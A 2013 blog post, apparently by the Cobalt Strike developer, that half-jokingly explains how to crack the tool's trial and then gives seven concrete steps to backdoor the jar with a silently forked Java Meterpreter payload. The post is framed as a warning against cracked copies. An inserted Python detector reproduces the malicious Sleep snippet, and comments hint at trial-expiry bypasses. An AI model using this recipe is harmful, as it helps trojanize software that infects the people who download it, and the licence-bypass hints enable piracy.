How to crack Cobalt Strike AND backdoor it

September 5, 2013

You know you’ve made it (somewhere?) as a software developer, when people pirate your stuff.  From various searches, I see that several “cracked” versions of the Cobalt Strike trial exist. Since there’s interest in pirating Cobalt Strike, I’d like to speculate about which steps I would take to crack the Cobalt Strike trial and add a backdoor to it, prior to distribution on an unofficial site.

At its core, Cobalt Strike is a Java application. Java applications are packaged as .jar files. Jar files are complex. So complex, a major conference carried a talk on how to reverse engineer them in early 2012. I’ll skip the reference to this talk and point in the right direction: use unzip. The unzip tool uses a sophisticated algorithm based on LZ77 and Huffman coding. After unzip, all of the Cobalt Strike files will spill out:

Java applications consist of .class files. These files do not represent the socio-economic status of the code. Rather, they are the compiled form of several .java files. Cobalt Strike is a strange beast of an application though. There are also several .sl files. These are Sleep files. Sleep is a simple scripting language I’ve worked on since 2002. I write in Sleep because I’m very efficient with it.

For the aspiring cracker, Sleep is a welcome sight. Its files do not ship in a compiled form. They’re available as plaintext inside of the application archive. A plaintext file requires a special tool, called a text editor, to change its content. I recommend notepad.exe or pico. Linux hackers may use WINE to run notepad.exe. Type:

wine notepad.exe

Knowing how to navigate code and find things is a key skill for an aspiring cracker. My favorite way to search through source code is grep.

grep -r "some string" .

To crack Cobalt Strike, look for a file that manages license information. The trial expired message is a good string to look for. One change, in one line of code, will make a trial that will never expire. Remember–this is a violation of the license agreement.

Why stop at removing the trial restriction? For those with the skills and insights in this post, it’s a few steps to crack Cobalt Strike and use it to distribute malware.

Here’s how to do it with Cobalt Strike:

1. Define a listener for Java Meterpreter. Go to Cobalt Strike -> Listeners and press Add. Listeners are Cobalt Strike’s concept of persistent Metasploit Framework handlers. Each time Cobalt Strike is run, the defined listeners automatically start.

2. Export a Java Meterpreter package. Go to Attacks -> Packages -> Java Application. Choose a listener and press Generate. Cobalt Strike makes it easy to export artifacts to use in social engineering attacks.

3. Use unzip to extract the Java Meterpreter package into a folder.

4. cd to this folder and delete META-INF/MANIFEST.MF

5. Copy all of the Java Meterpreter files, unchanged, into the folder where the extracted Cobalt Strike lives.

6. Add this code to the bottom of a .sl file:

fork({
   [metasploit.Payload main: $null];
});

This Sleep code will silently run Java Meterpreter in its own thread. Consult the Sleep manual for different ways to obfuscate this code.

7. The opposite of unzip is zip. Use this program to package the extracted Cobalt Strike files into one zip file. The cracked trial filename should end in .jar.

Congratulations, a backdoored version of Cobalt Strike is now ready for distribution.
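The seven steps above leave two fingerprints in the archive: files that were never in the official jar, and a .sl script that grew a fork() calling a Java class's main(). As an added defender-side example (not code from this post or from Cobalt Strike), the script below diffs a suspect jar against a known-good copy and scans its Sleep scripts for that pattern; the two jars it builds are constructed in memory and are not real Cobalt Strike files.

```python
import io
import re
import zipfile
from hashlib import sha256

# Constructed sample jars (not real Cobalt Strike files): a clean archive and a copy
# tampered the way the post describes (payload classes added, fork() appended to a .sl).
CLEAN = {
    "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\nMain-Class: aggressor.Aggressor\n",
    "aggressor/Aggressor.class": b"\xca\xfe\xba\xbe clean class bytes",
    "scripts/default.sl": b'println("hello");\n',
}
TAMPERED = dict(CLEAN)
TAMPERED["metasploit/Payload.class"] = b"\xca\xfe\xba\xbe payload class bytes"
TAMPERED["scripts/default.sl"] += b"fork({\n   [metasploit.Payload main: $null];\n});\n"

def build_jar(entries):  # pack a name->bytes dict into an in-memory jar (a zip file)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

def digests(jar_bytes):  # entry name -> SHA-256 of its content
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return {n: sha256(zf.read(n)).hexdigest() for n in zf.namelist()}

def diff_jars(known_good, suspect):
    """Entries added, removed or changed relative to a known-good copy."""
    good, sus = digests(known_good), digests(suspect)
    return {
        "added": sorted(set(sus) - set(good)),
        "removed": sorted(set(good) - set(sus)),
        "modified": sorted(n for n in good.keys() & sus.keys() if good[n] != sus[n]),
    }

# A fork() whose body calls some Java class's static main: the pattern the post appends.
FORK_MAIN = re.compile(r"fork\s*\(\s*\{[^}]*\[\s*[\w.]+\s+main\s*:")

def suspicious_sleep_scripts(jar_bytes):
    """Names of .sl entries that spawn a Java class's main() inside fork()."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return [n for n in zf.namelist()
                if n.endswith(".sl") and FORK_MAIN.search(zf.read(n).decode("utf-8", "replace"))]

if __name__ == "__main__":
    clean, bad = build_jar(CLEAN), build_jar(TAMPERED)
    print(diff_jars(clean, bad))            # added: metasploit/Payload.class; modified: scripts/default.sl
    print(suspicious_sleep_scripts(bad))    # ['scripts/default.sl']
```

Against a real download, the known-good side is the trial jar fetched from the official site; any entry the diff reports as added or modified is worth opening before the jar is ever run.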

Cracked Cobalt Strike trials are available on many websites. I have never downloaded one and I do not intend to. The process I went through in this post isn’t the only way to add a backdoor to an unofficial copy of Cobalt Strike.

There is a way to get a clean copy of Cobalt Strike though. Download a 21 day trial through the official website.

43 comments

  1. Needless to say, this is illegal. Bear this in mind before distributing a backdoored version of something. You could get backfired…


  2. This blog post sat in my queue for a long time. Awhile back, someone emailed me for support on a cracked version of Cobalt Strike. They couldn’t figure out how to untar a file with spaces in it and came to me, claiming that my instructions were bad. I warned them that downloading a cracked trial is dangerous because it could have a backdoor. Of course, nothing makes risk real quite like demonstrating it–this is a core idea behind the Cobalt Strike product and it’s why I’m in business, hence this post.

    Here’s an anonymized peek into this exchange:

    From: TarIsHard
    To: Raphael

    I have gone through the support but not knowing what is wrong.. below is command i use and error i got

    root@bt:~# tar zxvf root/cobaltstrike-trial.tgz
    tar: root/cobaltstrike-Cracked-For: Cannot open: No such file or directory
    tar: Error is not recoverable: exiting now
    tar: Child returned status 2
    tar: BackTrack.tgz: Not found in archive
    tar: Exiting with failure status due to previous errors

    Kindly give me full guide to this.

    ~~~~~~

    From: Raphael
    To: TarIsHard

    If I’m not mistaken, you’re trying to extract:

    /root/cobaltstrike-Cracked-For-BackTrack.tgz

    I follow Google alerts on my product pretty regularly, I’ve never downloaded this modified version of Cobalt Strike, but my understanding is that it’s made available to get past my commercial and export restrictions. I can’t help you with this and you’re taking on a big risk running a modified version of Cobalt Strike that someone else made available. This hacked version of the software could damage your system or install malware. Not to mention, I’m a single member company–you’re trying to install a “cracked” version of my software AND you’re requesting support from me. Doesn’t this strike you as slightly… disrespectful?

    If I type:

    # tar zxvf root/cobaltstrike-Cracked-For BackTrack.tgz

    I get… the same exact output you pasted

    ~~~~~

    From: TarIsHard
    To: Raphael

    First of all i never deal in anything crack or bogus deal.

    I download your program and trying to run it on BackTrack 5 R3 as i stated before, but i keep getting problems then i send you email but it’s not helping.. then i google some help about it then i got this cobaltstrike-Cracked-For BackTrack.tgz.

    After trying many ways and couldn’t get it done, that is why i sent you the error i am getting.

    1. If i want to run crack or whatsoever you might call it, i don’t think i will be so dump to send it to you to help me with it

    2. Help you render is not working and i sent you another email stating what i have done and the ERRORS i keep getting..

    You can check my email [email protected] on your record, i registered to able to use your program.

    So now, i all i need from you to help me out to use the program before the 21 days runs out so i can see how it works so i can purchase after 21days


    • This is pretty funny, but I would think that people who can’t master tar aren’t exactly your target demographic anyway. ;)


    • Thank you so much for posting that exchange. Still laughing at how ‘not dump’ he is.

      But seriously, now that we’ve cracked your software, can TarIsHard and I come crash on your couch and eat all your food? WE ARE REGISTERED TO BE ABLE TO EAT YOUR FOOD.


  3. I laughed immensely at Linux hackers wanting to use notepad.exe and grep as an advanced form of code navigation.

    Good sense of humor.


    • Totally lost it there too!


    • But grep is awesome
      grep -o "sometext" -B 2 -A1 < <(cat myfile) | sed "s/hax/moarhax/g"

      ..
      what? People said cat | grep is bad


  4. So now we know that you’re pretty good in adding backdoors… And how do we know that you didn’t backdoor your “legal” version ? ;-) After this post I surely won’t download any of your software :-D


  5. Wow. Have people not gotten the memo that antivirus depends on a signature for something 1) only in the past AND 2) reported? I’ve witnessed malware attack production time and time again evade antivirus because the manufacturing of novel variants is immense. So it’s more or less worthless because it does about a 40% job.

    And then there’s clowns that run something from an unknown source, it’s game over… It would be safer for you to post your credit card numbers, passwords and keyboard log on Twitter. Not just that, you have to reinstall the OS and every app because it is impossible to provably “clean” an owned machine. That’s a day’s pay or productivity wiped out. What’s that worth to you?


  6. I cant stop laughing at the idea of using a cracked version of software where the very software can be used to compromise your system.

    Thanks for the amazing work!


  7. Well, you don’t need to download a cracked version, or extract the jar files to make Cobalt Strike run after the trial period expires. You can change a UNIX time stamp in ….. or simply remove the line, and you have 21 more days to play with it ;-)


    • Yes. :) We’ll leave that as an exercise to the reader.


  8. Is this some kind of joke? Requiring wine to run notepad on Linux? There’s like a million text editors for Linux. Java being complicated? Basic LZW compression considered witchcraft? Purely because this application is in Java makes things easier since there are byte code dis-assemblers available which more-or-less return the original source. Hell, that’s why there is a Youtube instruction video on how to remove your pathetic protection mechanism. You don’t even need to fork or use metasploit to install a “backdoor” in any application, you just need to insert code virtually anywhere. Sigh… I could crack this thing in my sleep. What, you just graduated straight from college or something? You sir, are a joke.


    • Thank you. I blog to put my ideas out there and get feedback. When someone as skilled as you comes to participate in the discussion it’s a true honor. I will look for these other text editors you mention. Also, I will study more on LZW–compression, right? If you email me, maybe you can help me strengthen my protection mechanism. I would like it to require at least two changes in the code to make the trial not expire. One line of code–anyone can do. But two! That requires twice as much effort. Again, I am humbled by your presence in my blog’s comment section. Thank you. Stay who you are!


    • You code, fail to grasp social cues indicating humor, and are needlessly combative.

      Congratulations on being a complete stereotype. Your neckbeard will be checked for ticks and you’ll be given some Mountain Dew on your way out.


      • ROFLMAO – lulz XD


    • Q: Is this some kind of joke?
      A: Yes


  9. Oh man.. all the butthurt little kids here… This article is clearly facetious. Anyone who has ever done RE knows that time-based trials are almost always incredibly easy to get around. If you need to pirate this software, it isn’t for you. Go home.

    Additionally, he’s pointing out that downloading cracked software is a pretty damn good way to get yourself owned.

    Come on people.


  10. Reading your post made me rofl so hard, so thx for the :D. When i clicked around and saw a host that looked familiar, another lol when i saw that your friend is my friend on irc, world is too small. :D And now with the comment replies, pure gold.

    Cya, stay good.


  11. LoL. You sir are a gentleman and a scholar! Bravo!


  12. Raphael

    You have made my day. This was one of the best smartass put downs I have read in a long time.

    lmao
    Matt


  13. Thanks for this very enlightening post. Unfortunately I’m running on Windows so I got stuck at ‘wine notepad.exe’. Can I get Wine for Windows? Thanks so much, Chris


    • Doh! Don’t worry… I’ll put these instructions on cvshub and give someone commit rights to post the Windows version. Thanks Chris!


      • Mine same trouble like user Chris haven’t. It is primary OS (operating system) display MS (mikrosoft) Windows Xp Sp3 (setvice pack). I downloaded VMWares and make the LINUX VM now I can login root but trying command “wine notepad.exe” to start crack program but command not found. Do you ever try with VM (virtual machinery)?? I like cracking but this one making me stuck. I have researching sleep and find bash (Bourne again shell) function like sleep(5) is that correct function to learn about sleep to crack CS (COBALT Strike)


    • You should install a program called “Cygwin” on your Windows system. This will create a Unix environment in which you can run “wine”. From there you should be able to run “notepad” on your Windows system.


      • Can there be method to use program like the wine crackers one notepad that included with MS (Microsoft) Windows Xp Sp3 (service pack). I am run out of memory (Ram) after hours to finally install the “Cygwin” and try to get VMWares (virual machinery) preparing LINUX GUEST.


  14. badass-MacBook-Pro% wine notepad.exe
    zsh: command not found: wine

    I find your cracking tutorial seriously lacking.

    —–

    lol enjoyed it immensely


  15. That’s nice.. I understand all that, but i’m lazy. Maybe your audience is someone else, but $3000 a user sounds ridiculously expensive to me. I think if you have a reasonably priced product; you don’t have many people using a cracked version.

    The folks who can blow insane amounts like $3000 a year on pentest software are large corporations, whose risk management/HR should seek out and terminate anyone caught facilitating the use of cracked software, and security consultants, who are out of business if they are caught with cracked software.

    The working set of people in the world who need pentest software is much larger than that; everything from folks with personal web servers, to small academic departments with no budget, and Nmap doesn’t cut it.

    I think you will see lots of signs of people cracking software; wherever the vendors’ have collected failed the public by leaving a ludicrously underserved security market.


    • Cobalt Strike is not a scanner for the small business with a single web server and a few Windows workstations. It’s a threat emulation tool for use by professional red teams and consultants.


      • Then for disabled professionals lazy or scared. All this is already separately. This is for youngsters and newbies


  16. Thanks R! You made my day. Especially your reply to the comments.


  17. Very, very funny. Sad to see how many people just can’t get the joke, though.


  18. The post was good; a couple of the replies by the absolutely clueless made it even better. Bravo.


  19. Oh my dear!
    I am not a gamer, but I do love your attitude! Hope you are doing well with
    your software.

    Even if I have been using linux for 20+ years, and unix 30+, there are still
    a few things to be learned: using notepad.exe, did not know that!
    I will throw my emacs away, a smashing good editor at last.

    Keep up with the good work!
    /im


  20. I am sure this is PR to put off people using a cracked version of your software. However not everyone can afford the cost of this software and after seeing the price myself I would take the risk of installing a backdoor over paying for it.


    • Pricing is an art unto itself. Cobalt Strike is priced fairly for the professionals who use it to do a job.


      • As compared to Metasploit Pro or Core Impact (both worthy competitors), the pricing on Cobalt Strike is a steal.


    • When you are spending hundreds of thousands of dollars to staff a pen test team, any tool, in particular one like Cobalt Strike, that makes the use of their time more efficient is something you have to consider. Renewing my team’s CS licenses each year is a no-brainer (though then I have to deal with a true no-brainer, our acquisition system).


  21. Great post! Reminds me that I need to get around to writing my magnum opus: “Theoretical Physics for Dummies” sometime this year. Good luck, Raphael!


  22. All of this is already in metasploit set and Armitage. Here there is nothing new except that Bitcoin is in antivirus databases. Explain to me for what $ 2500?


    • Actually, the developer of Cobalt Strike builds lots of extra features to streamline the red-teaming process, such as custom covert channel payloads (beacon) and 2factor authentication bypass capability (browser pivoting), as well as other stuff like AV bypass and passive system profiling.


